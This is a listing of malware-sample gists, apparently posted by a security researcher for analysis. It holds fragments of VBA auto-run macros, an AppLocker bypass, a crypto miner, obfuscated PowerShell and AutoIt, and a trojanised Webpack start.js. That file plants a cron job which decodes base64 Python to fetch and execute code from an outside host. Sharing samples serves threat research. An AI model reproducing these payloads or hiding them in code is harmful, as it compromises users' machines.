
John Lambert JohnLaTwC

  • Microsoft Corporation
@JohnLaTwC
JohnLaTwC / f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058.txt
Created March 27, 2018 13:43
VBA threat that uses Certutil and Task Scheduler
## uploaded by @JohnLaTwC
## Sample hash: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASIHB-- f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
===============================================================================
FILE: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058
Type: OpenXML
-------------------------------------------------------------------------------
@JohnLaTwC
JohnLaTwC / script.xsl
Created April 6, 2018 14:18
MSXSL AppLocker bypass
## uploaded by @JohnLaTwC
## Sample hash: d6fdeac5bced885c470660f09a0da8ea7a7660b5b8542ad487b56976e88fa733
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
@JohnLaTwC
JohnLaTwC / cryptonight.js
Created April 8, 2018 15:57
Cryptonight currency miner WASM
## Uploaded by @JohnLaTwC
## Sample hash: bd0984491d0c6b11162ddcec58bd660f0e779c8b399f153d160bb02fa72aadbc
var a='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
@JohnLaTwC
JohnLaTwC / Brazil PS1 threat
Created April 20, 2018 17:30
Brazil PS1 threat
## uploaded by @JohnLaTwC
## Sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c
function _/=\_____/==\/=\/\
{
try
{
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
${/=====\_/\/\_/\_/} = ""
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
@JohnLaTwC
JohnLaTwC / YQYgT.au3
Created June 13, 2018 15:33
AutoIt malware script 8d82727e497449d3648c29f2216ff026afe8079b070012984aa6954e3ed0b139
#NoTrayIcon
#EndRegion
; Excerpt of an AutoIt sample (hash given in the gist title). Only the leading
; declarations are visible here; the statements that use these values are not
; part of this preview, so their purpose cannot be stated from this excerpt.
; The identifiers look randomised; each is initialised to a literal string,
; except $bBOiAYNfPdZMWbP, which is initialised to the integer 0 via Int("0").
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
WScript.Timeout=0
dim Wsh
set Wsh =WScript.CreateObject("WScript.Shell")
dim fs
set fs= CreateObject("Scripting.FileSystemObject")
dim w
Set w = CreateObject("Microsoft.XMLHTTP")
dim dotnet
dotnet="No"
@JohnLaTwC
JohnLaTwC / Webpack start.js
Created July 13, 2018 21:34
03d9abc82fd79d2f407e7be455995cb9938dcb9d4a52ee41ca5fc47d278a4e7d
'use strict';
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2
@JohnLaTwC
JohnLaTwC / start.js
Created July 13, 2018 21:44
03d9abc82fd79d2f407e7be455995cb9938dcb9d4a52ee41ca5fc47d278a4e7d Decode
'use strict';
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)
@JohnLaTwC
JohnLaTwC / 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
Created August 15, 2018 22:04
VBA sample 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
## Uploaded by @JohnLaTwC
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
Sub AutoOpen()
Dim abjaWFApqTOaGknEZ As String
Dim EVvHI As Object
Dim aqwMEEghqLNesI As Integer
Dim TgAVw As String
aqwMEEghqLNesI = 816
abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"